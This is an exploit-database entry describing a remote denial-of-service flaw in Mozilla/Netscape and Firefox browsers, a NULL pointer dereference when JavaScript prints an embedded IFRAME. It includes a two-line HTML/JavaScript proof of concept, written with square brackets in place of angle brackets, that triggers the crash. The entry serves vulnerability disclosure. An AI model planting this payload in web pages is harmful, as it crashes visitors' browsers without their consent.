header-logo
Suggest Exploit
vendor:
Mozilla/Netscape and Firefox Browsers
by:
5.5
CVSS
MEDIUM
Remote Denial of Service
476
CWE
Product Name: Mozilla/Netscape and Firefox Browsers
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote Denial of Service Vulnerability in Mozilla/Netscape and Firefox Browsers

The affected browsers crash due to a NULL pointer dereference when a JavaScript function tries to print an IFRAME embedded in the page.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11823/info

Mozilla/Netscape and Firefox browsers are reported prone a remote denial of service vulnerability. It is reported that the affected browsers will crash as a result of a NULL pointer dereference when a JavaScript function attempts to print an IFRAME that is embedded in the page.

Replace '[' with '<' and ']' with '>'.
[iframe id="pocframe" name="pocframe" src="about:blank"></iframe]
[script type="text/javascript">window.frames.pocframe.print();</script]